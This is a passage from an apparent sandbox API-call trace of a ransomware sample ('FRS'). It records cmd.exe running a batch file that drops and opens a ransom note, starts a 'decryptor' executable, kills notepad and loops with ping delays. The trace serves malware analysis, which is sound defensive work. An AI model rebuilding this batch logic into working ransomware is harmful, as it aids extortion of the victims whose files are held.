lpDistanceToMoveHigh=0x0) returned 0x868 [0122.799] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0122.799] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0122.799] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.799] GetFileType (hFile=0x260) returned 0x1 [0122.799] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0122.799] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.800] SetFilePointer (in: hFile=0x260, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0122.800] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0122.800] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0122.800] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.800] GetFileType (hFile=0x260) returned 0x1 [0122.800] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0122.800] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0122.800] SetFilePointer (in: hFile=0x260, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0122.800] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0122.800] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0122.800] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.800] GetFileType (hFile=0x260) returned 0x1 [0122.800] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0122.800] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0122.800] SetFilePointer (in: hFile=0x260, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0122.800] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0122.800] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0122.800] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.800] GetFileType (hFile=0x260) returned 0x1 [0122.800] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0122.800] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0122.800] SetFilePointer (in: hFile=0x260, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0122.800] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0122.800] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0122.800] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.800] GetFileType (hFile=0x260) returned 0x1 [0122.800] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0122.800] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0122.800] SetFilePointer (in: hFile=0x260, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0122.800] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0122.801] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0122.801] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.801] GetFileType (hFile=0x260) returned 0x1 [0122.801] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0122.801] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0122.801] SetFilePointer (in: hFile=0x260, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0122.801] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0122.801] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0122.801] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.801] GetFileType (hFile=0x260) returned 0x1 [0122.801] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0122.801] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0122.801] SetFilePointer (in: hFile=0x260, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0122.801] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0122.801] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0122.801] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.801] GetFileType (hFile=0x260) returned 0x1 [0122.801] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0122.801] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0122.801] SetFilePointer (in: hFile=0x260, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0122.801] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0122.801] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0122.801] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.801] GetFileType (hFile=0x260) returned 0x1 [0122.801] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0122.801] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0122.801] SetFilePointer (in: hFile=0x260, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0122.801] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0122.801] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0122.801] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.801] GetFileType (hFile=0x260) returned 0x1 [0122.801] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0122.802] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0122.802] SetFilePointer (in: hFile=0x260, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0122.802] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0122.802] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0122.802] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.802] GetFileType (hFile=0x260) returned 0x1 [0122.802] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0122.802] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0122.802] SetFilePointer (in: hFile=0x260, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0122.802] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0122.802] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0122.802] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.802] GetFileType (hFile=0x260) returned 0x1 [0122.802] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0122.802] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0122.802] SetFilePointer (in: hFile=0x260, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0122.802] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0122.802] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0122.802] _get_osfhandle (_FileHandle=1) returned 0x28 [0122.802] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0122.802] _get_osfhandle (_FileHandle=0) returned 0x24 [0122.803] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0122.803] SetConsoleInputExeNameW () returned 0x1 [0122.803] GetConsoleOutputCP () returned 0x1b5 [0122.803] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0122.803] SetThreadUILanguage (LangId=0x0) returned 0x409 [0122.803] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x260 [0122.803] _open_osfhandle (_OSFileHandle=0x260, _Flags=8) returned 3 [0122.803] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.803] SetFilePointer (in: hFile=0x260, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0122.803] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0122.803] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0122.803] SetFilePointer (in: hFile=0x260, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0122.803] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0122.803] GetFileType (hFile=0x260) returned 0x1 [0122.803] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.803] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0122.803] _tell (_FileHandle=3) returned 2512 [0122.804] _close (_FileHandle=3) returned 0 [0122.804] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0122.804] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0122.804] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0122.804] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0122.804] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0122.804] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0122.804] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0122.804] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0122.804] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0122.804] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0122.804] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0122.804] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0122.804] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0122.804] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0122.804] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0122.804] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0122.804] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0122.804] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0122.804] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0122.804] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0122.804] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0122.804] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0122.804] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0122.804] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0122.804] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0122.804] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0122.804] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0122.804] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0122.804] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0122.804] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0122.804] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0122.804] _wcsicmp (_String1="ping", _String2="START") returned -3 [0122.804] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0122.804] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0122.804] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0122.804] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0122.804] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0122.804] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0122.804] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0122.804] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0122.804] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0122.804] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0122.804] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0122.804] SetErrorMode (uMode=0x0) returned 0x0 [0122.805] SetErrorMode (uMode=0x1) returned 0x0 [0122.805] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0122.805] SetErrorMode (uMode=0x0) returned 0x1 [0122.805] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0122.805] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0122.805] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0122.805] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0122.805] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0122.805] GetLastError () returned 0x2 [0122.805] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0122.805] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd5a1f0 [0122.805] FindClose (in: hFindFile=0xd5a1f0 | out: hFindFile=0xd5a1f0) returned 1 [0122.805] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0122.805] GetLastError () returned 0x2 [0122.805] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59e70 [0122.805] FindClose (in: hFindFile=0xd59e70 | out: hFindFile=0xd59e70) returned 1 [0122.805] GetFileType (hFile=0x28) returned 0x2 [0122.805] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0122.806] _dup (_FileHandle=1) returned 3 [0122.806] _close (_FileHandle=1) returned 0 [0122.806] _wcsicmp (_String1="nul", _String2="con") returned 11 [0122.806] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0122.806] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0122.806] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0122.806] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0122.806] SetErrorMode (uMode=0x0) returned 0x0 [0122.806] SetErrorMode (uMode=0x1) returned 0x0 [0122.806] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61468, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0122.806] SetErrorMode (uMode=0x0) returned 0x1 [0122.806] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0122.806] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0122.806] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0122.806] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0122.806] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0122.806] GetLastError () returned 0x2 [0122.806] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0122.806] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59e70 [0122.806] FindClose (in: hFindFile=0xd59e70 | out: hFindFile=0xd59e70) returned 1 [0122.807] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0122.807] GetLastError () returned 0x2 [0122.807] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59d70 [0122.807] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0122.807] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0122.807] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0122.807] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0122.807] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", 